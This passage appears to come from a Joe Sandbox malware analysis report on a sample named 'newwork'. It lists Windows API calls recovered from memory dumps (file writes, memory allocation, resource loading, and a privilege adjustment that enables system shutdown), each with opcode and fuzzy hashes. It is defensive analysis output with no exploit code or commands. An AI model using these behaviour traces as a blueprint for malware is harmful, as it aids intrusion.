                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1658689577-0
                                                                                        • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                        • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                        • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                        • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                        • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                        • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                        • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                        • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                        • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                        • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                        • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                        • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                        • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID:
                                                                                        • API String ID: 442123175-0
                                                                                        • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                        • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                        • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                        • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1306739567-0
                                                                                        • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                        • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                        • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                        • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNEL32(?,020A8000,0040AA59,00000000), ref: 004076B3
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 734332943-0
                                                                                        • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                        • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                        • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                        • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                        • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                        • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                        • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                        • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                        • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                        • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                        APIs
                                                                                        • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrev
                                                                                        • String ID:
                                                                                        • API String ID: 122130370-0
                                                                                        • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                        • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                        • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                        • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                        • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                        • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                        • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                        • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                        • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                        • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                        • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                        • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                        • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                        • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                        • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 107509674-3733053543
                                                                                        • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                        • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                        • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                        • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                        • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                        • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                        • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                        • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                        • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                        • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                        • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                        APIs
                                                                                        • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: SystemTime
                                                                                        • String ID:
                                                                                        • API String ID: 2656138-0
                                                                                        • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                        • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                        • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                        • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                        • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                        • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                        • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                        • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                        • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                        • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                        • API String ID: 4190037839-2401316094
                                                                                        • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
